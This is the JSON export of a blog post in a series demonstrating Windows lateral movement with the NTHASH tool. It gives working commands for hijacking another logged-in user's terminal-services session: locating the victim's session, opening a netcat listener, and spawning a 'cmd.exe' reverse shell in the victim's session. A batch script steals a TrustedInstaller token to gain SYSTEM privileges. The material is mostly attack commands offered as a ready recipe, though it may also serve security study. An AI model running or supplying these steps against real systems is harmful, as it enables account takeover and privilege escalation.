{"id":2210,"date":"2019-10-30T18:01:36","date_gmt":"2019-10-30T17:01:36","guid":{"rendered":"http:\/\/labalec.fr\/erwan\/?p=2210"},"modified":"2019-10-31T22:46:13","modified_gmt":"2019-10-31T21:46:13","slug":"demonstrating-lateral-movement-with-nthash-part-8","status":"publish","type":"post","link":"https:\/\/labalec.fr\/erwan\/?p=2210","title":{"rendered":"Demonstrating lateral movement with NTHASH Part #8"},"content":{"rendered":"<p>In previous <a href=\"https:\/\/labalec.fr\/erwan\/?p=2206\" rel=\"noopener\" target=\"_blank\">article <\/a>we have (ab)used windows tokens to steal someone else account.<\/p>\n<p>Lets see a different way to perform this task (ab)using terminal services.<\/p>\n<p>1.Retrieve the session id of your victim with <strong>qwinsta<\/strong><\/p>\n<p>2.Open a shell (within the attacker session) to which your victim will connect to : <strong>nc -L -vv -p 9000<\/strong><\/p>\n<p>3.Spawn a process within your victim session which will connect back to your shell : <strong>NTHASH-win64.exe \/runts \/user:session_id \/binary:nc 127.0.0.1 9000 -e cmd.exe<\/strong><\/p>\n<p>And again, enjoy the output of your <strong>whoami<\/strong>.<\/p>\n<p>Note that you need special privileges (SeTcbPrivilege) to perform step 3 &#8211; my preference goes to using a \u00ab\u00a0trustedinstaller\u00a0\u00bb session (but many other context will do like winlogon, etc).<\/p>\n<p>If need be, the below batch will create a new shell with proper privileges to perform step 3 above.<br \/>\n<code><br \/>\n@echo off<br \/>\nnet start trustedinstaller<br \/>\nfor \/F \"tokens=1\" %%K in (' nthash-win64 \/enumproc ^| findstr \/i \"trustedinstaller\" ') do ( nthash-win64 \/runastoken \/pid:%%K \/system )<br \/>\n<\/code><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In previous article we have (ab)used windows tokens to steal someone else account. Lets see a different way to perform this task (ab)using terminal services. 1.Retrieve the session id of your victim with qwinsta 2.Open a shell (within the attacker session) to which your victim will connect to : nc -L -vv -p 9000 3.Spawn <a href='https:\/\/labalec.fr\/erwan\/?p=2210' class='excerpt-more'>[&#8230;]<\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[118],"tags":[],"class_list":["post-2210","post","type-post","status-publish","format-standard","hentry","category-nthash","category-118-id","post-seq-1","post-parity-odd","meta-position-corners","fix"],"_links":{"self":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2210","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2210"}],"version-history":[{"count":5,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2210\/revisions"}],"predecessor-version":[{"id":2226,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2210\/revisions\/2226"}],"wp:attachment":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2210"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2210"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2210"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}